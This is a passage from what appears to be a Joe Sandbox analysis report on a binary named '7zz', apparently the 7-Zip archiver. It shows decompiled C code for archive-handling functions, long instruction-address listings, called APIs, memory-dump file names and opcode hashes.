											 *((intOrPtr*)(_t596 - 0x54)) = 0x47a420;
											 *(_t596 - 4) = 0xc;
											E0040862D();
											 *(_t596 - 4) = 0xa;
											E00408604(_t596 - 0x54);
											__eflags = _t585;
											if(_t585 != 0) {
												E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
												_push( *((intOrPtr*)(_t596 - 0x20)));
												L52:
												E00407A18();
												 *(_t596 - 4) =  *(_t596 - 4) | 0xffffffff;
												E00408604(_t596 - 0x68);
												_t328 = _t585;
												goto L84;
											}
											L48:
											E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
											_t170 = _t596 - 4;
											 *_t170 =  *(_t596 - 4) & 0x00000000;
											__eflags =  *_t170;
											E00407A18( *((intOrPtr*)(_t596 - 0x20)));
											goto L49;
										}
										_push(0x80004005);
										L46:
										E00415C6D( *((intOrPtr*)(_t596 + 0x24)));
										_push(_t596 - 0x20);
										E00406796( *((intOrPtr*)(_t596 + 0x20)));
										goto L48;
									}
									_t411 = E00408C9E(_t584);
									__eflags = _t411;
									if(_t411 == 0) {
										goto L48;
									}
									_push(GetLastError());
									goto L46;
								}
								_t532 =  *((intOrPtr*)(_t596 - 0x5c));
								__eflags =  *((char*)(_t532 + _t388));
								if( *((char*)(_t532 + _t388)) == 0) {
									goto L49;
								}
								goto L40;
								L49:
								_t388 =  *(_t596 + 0x18) + 1;
								__eflags = _t388 -  *(_t469 + 0x18);
								 *(_t596 + 0x18) = _t388;
							} while (_t388 <  *(_t469 + 0x18));
							goto L50;
						} else {
							goto L17;
						}
						do {
							L17:
							_t586 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x30)) +  *(_t596 + 0x18) * 4));
							_t415 =  *((intOrPtr*)( *((intOrPtr*)(_t586 + 0xc))));
							_push(_t415);
							 *((intOrPtr*)(_t596 + 0x10)) = _t415;
							L0040B0A0(_t596 - 0x20,  *((intOrPtr*)(_t596 + 0xc)));
							 *(_t596 - 4) = 1;
							L0040351A(_t596 - 0x9c);
							_push( *((intOrPtr*)(_t596 - 0x20)));
							 *(_t596 - 4) = 2;
							_t418 = E0040B431(_t596 - 0xc4,  *((intOrPtr*)(_t596 + 0xc)), __eflags); // executed
							__eflags = _t418;
							if(_t418 != 0) {
								_t473 =  *(_t596 - 0xa4) >> 0x00000004 & 0x00000001;
								__eflags = _t473;
								if(_t473 == 0) {
									__eflags =  *((char*)(_t586 + 0x15));
									if( *((char*)(_t586 + 0x15)) != 0) {
										L21:
										E00405B9F(_t596 - 0x34);
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										_push(_t596 - 0x9c);
										 *(_t596 - 4) = 3;
										_t421 = E00406796(_t596 - 0x34);
										__eflags = _t473;
										_t424 = E00408E8A( *(_t596 - 0x10), 0, _t596 - 0x34, _t421 & 0xffffff00 | _t473 == 0x00000000);
										__eflags = _t424;
										 *((intOrPtr*)(_t596 - 0x34)) = 0x47a420;
										if(_t424 == 0) {
											 *(_t596 - 4) = 5;
											E0040862D();
											 *(_t596 - 4) = 2;
											E00408604(_t596 - 0x34);
											_push( *((intOrPtr*)(_t596 + 0x14)) + 0x3c);
											_push(_t596 - 0xc4);
											E004150E0( *((intOrPtr*)(_t596 - 0x3c)),  *((intOrPtr*)(_t596 + 8)), __eflags);
											__eflags = _t473;
											if(_t473 == 0) {
												L35:
												E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
												_t116 = _t596 - 4;
												 *_t116 =  *(_t596 - 4) & 0x00000000;
												__eflags =  *_t116;
												E00407A18( *((intOrPtr*)(_t596 - 0x20)));
												_t469 =  *(_t596 - 0x10);
												goto L36;
											}
											E00405B9F(_t596 - 0x8c);
											 *((intOrPtr*)(_t596 - 0x8c)) = 0x47a420;
											 *(_t596 - 4) = 6;
											_t587 = E00408B37( *(_t596 - 0x10),  *((intOrPtr*)(_t596 + 0x10)));
											__eflags = _t587;
											if(_t587 < 0) {
												_push( *((intOrPtr*)(_t596 + 0x10)));
												_t588 =  *(_t596 - 0x10);
												E00406796(_t596 - 0x8c);
												L32:
												_push( *((intOrPtr*)(_t596 + 0x24)));
												_push( *((intOrPtr*)(_t596 + 0x20)));
												_push( *(_t596 + 0x1c));
												_push(1);
												_push( *((intOrPtr*)(_t596 + 0x14)));
												_push(_t596 - 0x8c);
												_push( *((intOrPtr*)(_t596 + 0xc)));
												_push(_t596 - 0x9c);
												_push( *((intOrPtr*)(_t596 + 8)));
												_t585 = E00415BCA(_t588,  *((intOrPtr*)(_t596 - 0x3c)), __eflags);
												 *((intOrPtr*)(_t596 - 0x8c)) = 0x47a420;
												__eflags = _t585;
												if(_t585 != 0) {
													 *(_t596 - 4) = 7;
													E0040862D();
													 *(_t596 - 4) = 2;
													E00408604(_t596 - 0x8c);
													E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
													_push( *((intOrPtr*)(_t596 - 0x20)));
													goto L52;
												}
												 *(_t596 - 4) = 8;
												E0040862D();
												 *(_t596 - 4) = 2;
												_t555 = _t596 - 0x8c;
												L34:
												E00408604(_t555);
												goto L35;
											}
											__eflags =  *((intOrPtr*)(_t596 - 0x60)) - _t587;
											if(__eflags > 0) {
												L30:
												 *( *((intOrPtr*)(_t596 - 0x5c)) + _t587) =  *( *((intOrPtr*)(_t596 - 0x5c)) + _t587) & 0x00000000;
												_t588 =  *( *((intOrPtr*)( *(_t596 - 0x10) + 0x1c)) + _t587 * 4);
												goto L32;
											}
											_t476 = _t587 -  *((intOrPtr*)(_t596 - 0x60)) + 1;
											__eflags = _t476;
											do {
												L0043AC2F(_t596 - 0x68, 1);
												_t476 = _t476 - 1;
												__eflags = _t476;
											} while (__eflags != 0);
											goto L30;
										}
										 *(_t596 - 4) = 4;
										E0040862D();
										 *(_t596 - 4) = 2;
										_t555 = _t596 - 0x34;
										goto L34;
									}
									L24:
									E00415C6D( *((intOrPtr*)(_t596 + 0x24)), 0x80004005);
									_push(_t596 - 0x20);
									E00406796( *((intOrPtr*)(_t596 + 0x20)));
									goto L35;
								}
								__eflags =  *((char*)(_t586 + 0x16));
								if( *((char*)(_t586 + 0x16)) == 0) {
									goto L24;
								}
								goto L21;
							}
							E00415C6D( *((intOrPtr*)(_t596 + 0x24)), GetLastError());
							_push(_t596 - 0x20);
							E00406796( *((intOrPtr*)(_t596 + 0x20)));
							E00407A18( *((intOrPtr*)(_t596 - 0x9c)));
							 *(_t596 - 4) =  *(_t596 - 4) & 0x00000000;
							E00407A18( *((intOrPtr*)(_t596 - 0x20)));
							L36:
							 *(_t596 + 0x18) =  *(_t596 + 0x18) + 1;
							__eflags =  *(_t596 + 0x18) -  *(_t469 + 0x2c);
						} while ( *(_t596 + 0x18) <  *(_t469 + 0x2c));
						goto L37;
					} else {
						goto L10;
					}
					while(1) {
						L10:
						_t460 =  *((intOrPtr*)( *((intOrPtr*)(_t469 + 0x30)) + _t590 * 4));
						__eflags =  *((char*)(_t460 + 0x14));
						if( *((char*)(_t460 + 0x14)) != 0) {
							goto L15;
						}
						__eflags =  *((intOrPtr*)(_t460 + 8)) - 1;
						if( *((intOrPtr*)(_t460 + 8)) != 1) {
							goto L15;
						}
						_t564 =  *((intOrPtr*)( *((intOrPtr*)(_t460 + 0xc))));
						__eflags =  *(_t564 + 4);
						if( *(_t564 + 4) == 0) {
							goto L15;
						}
						_t462 = E00408A3B(_t564);
						__eflags = _t462;
						if(_t462 != 0) {
							goto L15;
						}
						_t590 = _t590 + 1;
						__eflags = _t590 -  *(_t469 + 0x2c);
						if(_t590 <  *(_t469 + 0x2c)) {
							continue;
						}
						goto L15;
					}
					goto L15;
				}
				_t581 =  *((intOrPtr*)(_t596 + 0x14));
				_t579 =  *_t568;
				 *(_t596 - 0x38) = _t579;
				asm("cdq");
				asm("cdq");
				_t328 =  *( *(_t596 - 0x38))( *((intOrPtr*)(_t581 + 8)), _t579,  *((intOrPtr*)(_t581 + 0x44)), _t579,  *((intOrPtr*)( *((intOrPtr*)(_t596 + 0xc)))));
				if(_t328 == 0) {
					goto L7;
				}
				goto L84;
			}










































                                                                                                                                    0x00415425
                                                                                                                                    0x00415435
                                                                                                                                    0x00415439
                                                                                                                                    0x0041543c
                                                                                                                                    0x0041543f
                                                                                                                                    0x0041544a
                                                                                                                                    0x0041544a
                                                                                                                                    0x0041544e
                                                                                                                                    0x00415453
                                                                                                                                    0x00415482
                                                                                                                                    0x00415485
                                                                                                                                    0x00415485
                                                                                                                                    0x00415488
                                                                                                                                    0x0041548a
                                                                                                                                    0x0041548d
                                                                                                                                    0x004158a9
                                                                                                                                    0x004158ac
                                                                                                                                    0x004158b1
                                                                                                                                    0x004158b6
                                                                                                                                    0x004158ba
                                                                                                                                    0x004158c5
                                                                                                                                    0x004158c9
                                                                                                                                    0x004158d1
                                                                                                                                    0x004158d5
                                                                                                                                    0x004158da
                                                                                                                                    0x004158e5
                                                                                                                                    0x004158f0
                                                                                                                                    0x004158f8
                                                                                                                                    0x004158fc
                                                                                                                                    0x00415901
                                                                                                                                    0x00415903
                                                                                                                                    0x00415b38
                                                                                                                                    0x00415b42
                                                                                                                                    0x00415b4a
                                                                                                                                    0x00415b4d
                                                                                                                                    0x00415b52
                                                                                                                                    0x00415b58
                                                                                                                                    0x00415b5d
                                                                                                                                    0x00415b5d
                                                                                                                                    0x00415b5d
                                                                                                                                    0x00415b65
                                                                                                                                    0x00415b6e
                                                                                                                                    0x00415b73
                                                                                                                                    0x00415b73
                                                                                                                                    0x00415bb9
                                                                                                                                    0x00415bbf
                                                                                                                                    0x00415bc7
                                                                                                                                    0x00415bc7
                                                                                                                                    0x0041590e
                                                                                                                                    0x0041590e
                                                                                                                                    0x00415912
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415918
                                                                                                                                    0x0041591c
                                                                                                                                    0x00415953
                                                                                                                                    0x00415956
                                                                                                                                    0x0041595c
                                                                                                                                    0x0041595f
                                                                                                                                    0x0041596d
                                                                                                                                    0x0041596e
                                                                                                                                    0x00415972
                                                                                                                                    0x0041597d
                                                                                                                                    0x0041597e
                                                                                                                                    0x00415992
                                                                                                                                    0x0041599d
                                                                                                                                    0x004159a2
                                                                                                                                    0x004159a4
                                                                                                                                    0x004159a7
                                                                                                                                    0x004159d0
                                                                                                                                    0x004159d4
                                                                                                                                    0x004159dc
                                                                                                                                    0x004159e0
                                                                                                                                    0x00415a00
                                                                                                                                    0x00415a02
                                                                                                                                    0x00415a0d
                                                                                                                                    0x00415a14
                                                                                                                                    0x00415a15
                                                                                                                                    0x00415a20
                                                                                                                                    0x00415a23
                                                                                                                                    0x00415a25
                                                                                                                                    0x00415a27
                                                                                                                                    0x00415a27
                                                                                                                                    0x00415a25
                                                                                                                                    0x00415a31
                                                                                                                                    0x00415a34
                                                                                                                                    0x00415a36
                                                                                                                                    0x00415a44
                                                                                                                                    0x00415a47
                                                                                                                                    0x00415a4b
                                                                                                                                    0x00415a4f
                                                                                                                                    0x00415a5a
                                                                                                                                    0x00415a5f
                                                                                                                                    0x00415a61
                                                                                                                                    0x00415a69
                                                                                                                                    0x00415a69
                                                                                                                                    0x00415a61
                                                                                                                                    0x00415a6c
                                                                                                                                    0x00415a70
                                                                                                                                    0x00415a81
                                                                                                                                    0x00415a84
                                                                                                                                    0x00415a8c
                                                                                                                                    0x00415a8f
                                                                                                                                    0x00415a94
                                                                                                                                    0x00415a98
                                                                                                                                    0x00415aa3
                                                                                                                                    0x00415aa4
                                                                                                                                    0x00415aa7
                                                                                                                                    0x00415aa7
                                                                                                                                    0x00415aac
                                                                                                                                    0x00415ab8
                                                                                                                                    0x00415abb
                                                                                                                                    0x00415abe
                                                                                                                                    0x00415ac1
                                                                                                                                    0x00415ac2
                                                                                                                                    0x00415ac3
                                                                                                                                    0x00415acc
                                                                                                                                    0x00415acd
                                                                                                                                    0x00415ad0
                                                                                                                                    0x00415ad5
                                                                                                                                    0x00415ad7
                                                                                                                                    0x00415ada
                                                                                                                                    0x00415add
                                                                                                                                    0x00415b7e
                                                                                                                                    0x00415b82
                                                                                                                                    0x00415b8a
                                                                                                                                    0x00415b8e
                                                                                                                                    0x00415b93
                                                                                                                                    0x00415b96
                                                                                                                                    0x00415b9c
                                                                                                                                    0x00415ba4
                                                                                                                                    0x00415ba4
                                                                                                                                    0x00415ba4
                                                                                                                                    0x00415ba8
                                                                                                                                    0x00415bb2
                                                                                                                                    0x00415bb7
                                                                                                                                    0x00000000
                                                                                                                                    0x00415ae3
                                                                                                                                    0x00415ae3
                                                                                                                                    0x00000000
                                                                                                                                    0x00415ae3
                                                                                                                                    0x00415a72
                                                                                                                                    0x00415a72
                                                                                                                                    0x00415a76
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415a78
                                                                                                                                    0x00415a7b
                                                                                                                                    0x00000000
                                                                                                                                    0x00415a7b
                                                                                                                                    0x00415a38
                                                                                                                                    0x00415a38
                                                                                                                                    0x00415a3b
                                                                                                                                    0x00415ae7
                                                                                                                                    0x00415aea
                                                                                                                                    0x00415af2
                                                                                                                                    0x00415af6
                                                                                                                                    0x00415afb
                                                                                                                                    0x00415b05
                                                                                                                                    0x00415b0a
                                                                                                                                    0x00415b14
                                                                                                                                    0x00415b1f
                                                                                                                                    0x00415b27
                                                                                                                                    0x00415b2b
                                                                                                                                    0x00415b30
                                                                                                                                    0x00415b32
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415b32
                                                                                                                                    0x00415a36
                                                                                                                                    0x004159ac
                                                                                                                                    0x004159b0
                                                                                                                                    0x004159b8
                                                                                                                                    0x004159bc
                                                                                                                                    0x004159c1
                                                                                                                                    0x004159c4
                                                                                                                                    0x00000000
                                                                                                                                    0x004159c4
                                                                                                                                    0x0041591e
                                                                                                                                    0x00415922
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041592c
                                                                                                                                    0x00415934
                                                                                                                                    0x00415938
                                                                                                                                    0x00415940
                                                                                                                                    0x00415946
                                                                                                                                    0x00415948
                                                                                                                                    0x0041594a
                                                                                                                                    0x00415b77
                                                                                                                                    0x00000000
                                                                                                                                    0x00415b77
                                                                                                                                    0x00415950
                                                                                                                                    0x00000000
                                                                                                                                    0x00415950
                                                                                                                                    0x00000000
                                                                                                                                    0x0041590e
                                                                                                                                    0x00415493
                                                                                                                                    0x00415497
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041549d
                                                                                                                                    0x004154a0
                                                                                                                                    0x004154ce
                                                                                                                                    0x004154ce
                                                                                                                                    0x004154d1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004154dc
                                                                                                                                    0x004154e1
                                                                                                                                    0x004154eb
                                                                                                                                    0x004154ef
                                                                                                                                    0x004154f8
                                                                                                                                    0x004154fa
                                                                                                                                    0x00415723
                                                                                                                                    0x00415723
                                                                                                                                    0x00415725
                                                                                                                                    0x00415728
                                                                                                                                    0x0041572b
                                                                                                                                    0x00415870
                                                                                                                                    0x00415870
                                                                                                                                    0x00415877
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415731
                                                                                                                                    0x00415731
                                                                                                                                    0x00415731
                                                                                                                                    0x00415734
                                                                                                                                    0x00415743
                                                                                                                                    0x00415749
                                                                                                                                    0x00415752
                                                                                                                                    0x00415753
                                                                                                                                    0x0041575e
                                                                                                                                    0x00415762
                                                                                                                                    0x00415767
                                                                                                                                    0x00415770
                                                                                                                                    0x00415774
                                                                                                                                    0x00415779
                                                                                                                                    0x0041577b
                                                                                                                                    0x004157cc
                                                                                                                                    0x004157cf
                                                                                                                                    0x004157d1
                                                                                                                                    0x004157f1
                                                                                                                                    0x004157f6
                                                                                                                                    0x004157f9
                                                                                                                                    0x00415804
                                                                                                                                    0x00415807
                                                                                                                                    0x0041580b
                                                                                                                                    0x0041580e
                                                                                                                                    0x00415810
                                                                                                                                    0x00415813
                                                                                                                                    0x0041581a
                                                                                                                                    0x0041581d
                                                                                                                                    0x0041581e
                                                                                                                                    0x00415826
                                                                                                                                    0x00415828
                                                                                                                                    0x0041582e
                                                                                                                                    0x00415832
                                                                                                                                    0x0041583a
                                                                                                                                    0x0041583e
                                                                                                                                    0x00415843
                                                                                                                                    0x00415845
                                                                                                                                    0x00415887
                                                                                                                                    0x0041588c
                                                                                                                                    0x0041588f
                                                                                                                                    0x0041588f
                                                                                                                                    0x00415894
                                                                                                                                    0x0041589d
                                                                                                                                    0x004158a2
                                                                                                                                    0x00000000
                                                                                                                                    0x004158a2
                                                                                                                                    0x00415847
                                                                                                                                    0x0041584d
                                                                                                                                    0x00415855
                                                                                                                                    0x00415855
                                                                                                                                    0x00415855
                                                                                                                                    0x00415859
                                                                                                                                    0x00000000
                                                                                                                                    0x0041585f
                                                                                                                                    0x004157d3
                                                                                                                                    0x004157d8
                                                                                                                                    0x004157db
                                                                                                                                    0x004157e6
                                                                                                                                    0x004157e7
                                                                                                                                    0x00000000
                                                                                                                                    0x004157e7
                                                                                                                                    0x0041577f
                                                                                                                                    0x00415784
                                                                                                                                    0x00415786
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415792
                                                                                                                                    0x00000000
                                                                                                                                    0x00415792
                                                                                                                                    0x00415736
                                                                                                                                    0x00415739
                                                                                                                                    0x0041573d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415860
                                                                                                                                    0x00415863
                                                                                                                                    0x00415864
                                                                                                                                    0x00415867
                                                                                                                                    0x00415867
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00415500
                                                                                                                                    0x00415500
                                                                                                                                    0x00415509
                                                                                                                                    0x00415512
                                                                                                                                    0x00415514
                                                                                                                                    0x00415515
                                                                                                                                    0x00415518
                                                                                                                                    0x00415523
                                                                                                                                    0x00415527
                                                                                                                                    0x0041552c
                                                                                                                                    0x00415535
                                                                                                                                    0x00415539
                                                                                                                                    0x0041553e
                                                                                                                                    0x00415540
                                                                                                                                    0x00415584
                                                                                                                                    0x00415584
                                                                                                                                    0x00415587
                                                                                                                                    0x004155e0
                                                                                                                                    0x004155e4
                                                                                                                                    0x0041558f
                                                                                                                                    0x00415592
                                                                                                                                    0x00415597
                                                                                                                                    0x004155a3
                                                                                                                                    0x004155a4
                                                                                                                                    0x004155a8
                                                                                                                                    0x004155ad
                                                                                                                                    0x004155bc
                                                                                                                                    0x004155c1
                                                                                                                                    0x004155c3
                                                                                                                                    0x004155c6
                                                                                                                                    0x00415607
                                                                                                                                    0x0041560b
                                                                                                                                    0x00415613
                                                                                                                                    0x00415617
                                                                                                                                    0x00415628
                                                                                                                                    0x0041562f
                                                                                                                                    0x00415630
                                                                                                                                    0x00415635
                                                                                                                                    0x00415637
                                                                                                                                    0x004156f8
                                                                                                                                    0x004156fe
                                                                                                                                    0x00415706
                                                                                                                                    0x00415706
                                                                                                                                    0x00415706
                                                                                                                                    0x0041570a
                                                                                                                                    0x0041570f
                                                                                                                                    0x00000000
                                                                                                                                    0x00415713
                                                                                                                                    0x00415643
                                                                                                                                    0x00415648
                                                                                                                                    0x00415654
                                                                                                                                    0x0041565d
                                                                                                                                    0x0041565f
                                                                                                                                    0x00415661
                                                                                                                                    0x0041568d
                                                                                                                                    0x00415690
                                                                                                                                    0x00415699
                                                                                                                                    0x0041569e
                                                                                                                                    0x0041569e
                                                                                                                                    0x004156ac
                                                                                                                                    0x004156af
                                                                                                                                    0x004156b2
                                                                                                                                    0x004156b4
                                                                                                                                    0x004156b7
                                                                                                                                    0x004156be
                                                                                                                                    0x004156c1
                                                                                                                                    0x004156c2
                                                                                                                                    0x004156ca
                                                                                                                                    0x004156cc
                                                                                                                                    0x004156d2
                                                                                                                                    0x004156d4
                                                                                                                                    0x0041579b
                                                                                                                                    0x0041579f
                                                                                                                                    0x004157aa
                                                                                                                                    0x004157ae
                                                                                                                                    0x004157b9
                                                                                                                                    0x004157be
                                                                                                                                    0x00000000
                                                                                                                                    0x004157be
                                                                                                                                    0x004156e0
                                                                                                                                    0x004156e4
                                                                                                                                    0x004156e9
                                                                                                                                    0x004156ed
                                                                                                                                    0x004156f3
                                                                                                                                    0x004156f3
                                                                                                                                    0x00000000
                                                                                                                                    0x004156f3
                                                                                                                                    0x00415663
                                                                                                                                    0x00415666
                                                                                                                                    0x0041567b
                                                                                                                                    0x0041567e
                                                                                                                                    0x00415688
                                                                                                                                    0x00000000
                                                                                                                                    0x00415688
                                                                                                                                    0x0041566d
                                                                                                                                    0x0041566d
                                                                                                                                    0x0041566e
                                                                                                                                    0x00415673
                                                                                                                                    0x00415678
                                                                                                                                    0x00415678
                                                                                                                                    0x00415678
                                                                                                                                    0x00000000
                                                                                                                                    0x0041566e
                                                                                                                                    0x004155cb
                                                                                                                                    0x004155cf
                                                                                                                                    0x004155d4
                                                                                                                                    0x004155d8
                                                                                                                                    0x00000000
                                                                                                                                    0x004155d8
                                                                                                                                    0x004155e6
                                                                                                                                    0x004155ee
                                                                                                                                    0x004155f9
                                                                                                                                    0x004155fa
                                                                                                                                    0x00000000
                                                                                                                                    0x004155fa
                                                                                                                                    0x00415589
                                                                                                                                    0x0041558d
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x0041558d
                                                                                                                                    0x0041554c
                                                                                                                                    0x00415557
                                                                                                                                    0x00415558
                                                                                                                                    0x00415563
                                                                                                                                    0x0041556b
                                                                                                                                    0x0041556f
                                                                                                                                    0x00415714
                                                                                                                                    0x00415714
                                                                                                                                    0x0041571a
                                                                                                                                    0x0041571a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004154a2
                                                                                                                                    0x004154a2
                                                                                                                                    0x004154a5
                                                                                                                                    0x004154a8
                                                                                                                                    0x004154ac
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004154ae
                                                                                                                                    0x004154b2
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004154b7
                                                                                                                                    0x004154b9
                                                                                                                                    0x004154bd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004154bf
                                                                                                                                    0x004154c4
                                                                                                                                    0x004154c6
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004154c8
                                                                                                                                    0x004154c9
                                                                                                                                    0x004154cc
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x004154cc
                                                                                                                                    0x00000000
                                                                                                                                    0x004154a2
                                                                                                                                    0x00415458
                                                                                                                                    0x0041545b
                                                                                                                                    0x00415465
                                                                                                                                    0x00415468
                                                                                                                                    0x00415471
                                                                                                                                    0x00415477
                                                                                                                                    0x0041547b
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000

                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00415425
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000001,?,59@,00000000), ref: 00415542
                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,0000002A,?,59@,00000000), ref: 00415B38
                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000001,?,59@,00000000), ref: 0041578C
                                                                                                                                      • Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B
                                                                                                                                      • Part of subcall function 004092A8: __EH_prolog.LIBCMT ref: 004092AD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000D.00000002.403451683.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 0000000D.00000002.403374753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403832158.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403852206.000000000048A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403864312.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403884877.000000000048C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403936872.000000000048D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403953714.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 0000000D.00000002.403976635.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_7zz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorH_prologLast
                                                                                                                                    • String ID: 59@
                                                                                                                                    • API String ID: 1057991267-2780377667
                                                                                                                                    • Opcode ID: 56fbac971577f6c5102867ad13d0e8e6bc8bf9c522ce097f4992ad2490cc5e96
                                                                                                                                    • Instruction ID: 1d40638168d81cf388170db04f18bdef8ab4a9340640ae64ab53dda31c2c3f9c
                                                                                                                                    • Opcode Fuzzy Hash: 56fbac971577f6c5102867ad13d0e8e6bc8bf9c522ce097f4992ad2490cc5e96
                                                                                                                                    • Instruction Fuzzy Hash: 6C428D7090424DEFDF11DFA0C981BEDBBB5AF54308F1041AAE84577292DB38AE85CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00412027 Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 954COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                    			E00412027() {
				void* __ebx;
				void* __esi;
				intOrPtr* _t416;
				signed int _t418;
				signed int _t422;
				signed int _t425;
				signed int _t429;
				signed int _t434;
				signed int _t440;
				signed int _t461;
				signed int _t462;
				signed int _t474;
				signed int _t475;
				void* _t476;
				signed int _t479;
				signed int _t480;
				signed int _t490;
				void* _t508;
				signed int _t511;
				intOrPtr* _t512;
				signed int _t515;
				intOrPtr _t516;
				void* _t517;
				void* _t518;
				signed int _t522;
				void* _t533;
				void* _t534;
				void* _t536;
				signed int _t540;
				signed int _t559;
				void* _t570;
				void* _t571;
				signed int _t575;
				signed int _t584;
				signed int _t585;
				signed int _t589;
				signed int _t593;
				intOrPtr _t627;
				signed int _t628;
				void* _t633;
				signed int _t637;
				void* _t643;
				signed int _t651;
				intOrPtr _t681;
				signed int _t754;
				intOrPtr _t791;
				FILETIME* _t793;
				intOrPtr* _t796;
				signed int* _t797;
				intOrPtr* _t798;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t804;
				signed int _t805;
				signed int _t808;
				signed int _t810;
				signed int _t812;
				intOrPtr* _t813;
				signed int _t814;
				intOrPtr* _t815;
				intOrPtr* _t816;
				signed int _t817;
				intOrPtr* _t818;
				intOrPtr* _t819;
				signed int _t821;
				void* _t822;
				void* _t824;

				L0046B890(E0047455B, _t822);
				_t810 =  *(_t822 + 8);
				_t651 = 0;
				 *((intOrPtr*)(_t822 - 0x10)) = _t824 - 0x9c;
				_t416 =  *((intOrPtr*)(_t810 + 0xa0));
				_t796 = _t810 + 0xa0;
				 *((intOrPtr*)(_t822 - 4)) = 0;
				if(_t416 != 0) {
					 *((intOrPtr*)( *_t416 + 8))(_t416);
					 *_t796 = 0;
				}
				_t797 = _t810 + 0x98;
				 *( *(_t822 + 0x10)) = _t651;
				_t418 =  *_t797;
				if(_t418 != _t651) {
					 *((intOrPtr*)( *_t418 + 8))(_t418);
					 *_t797 = _t651;
				}
				 *(_t810 + 0x88) = _t651;
				 *(_t810 + 0x5d) = _t651;
				 *(_t810 + 0x58) = _t651;
				 *(_t810 + 0x8c) = _t651;
				 *(_t810 + 0x90) = _t651;
				 *(_t810 + 0x84) =  *(_t822 + 0xc);
				 *(_t822 - 0x48) = _t651;
				 *(_t822 - 0x44) = _t651;
				 *(_t822 - 0x40) = _t651;
				E00401E9A(_t822 - 0x48, 3);
				_push(_t822 - 0x48);
				 *((char*)(_t822 - 4)) = 1;
				_push( *(_t822 + 0xc));
				_t798 =  *((intOrPtr*)( *((intOrPtr*)(_t810 + 0x10))));
				_t422 = L004179F7( *((intOrPtr*)(_t810 + 0x10)));
				if(_t422 == _t651) {
					_t422 = L004179E9(_t810 + 0x80);
					__eflags = _t422 - _t651;
					if(_t422 != _t651) {
						goto L5;
					}
					E00401E26(_t810 + 0x44, _t822 - 0x48);
					 *(_t822 - 0x70) = _t651;
					 *(_t822 - 0x6e) = _t651;
					 *((char*)(_t822 - 4)) = 2;
					_t429 =  *((intOrPtr*)( *_t798 + 0x18))(_t798,  *(_t822 + 0xc), 0x1d, _t822 - 0x70);
					__eflags = _t429 - _t651;
					 *(_t822 + 8) = _t429;
					if(_t429 == _t651) {
						__eflags =  *(_t822 - 0x70) - _t651;
						if( *(_t822 - 0x70) == _t651) {
							L13:
							 *((char*)(_t822 - 4)) = 1;
							E0040C20F(_t822 - 0x70);
							_push(_t810 + 0x5d);
							_push(0xf);
							_t422 = L00417975(_t798,  *(_t822 + 0xc));
							__eflags = _t422 - _t651;
							if(_t422 != _t651) {
								goto L5;
							}
							_t422 = E00411FA9(_t810);
							__eflags = _t422 - _t651;
							if(_t422 != _t651) {
								goto L5;
							}
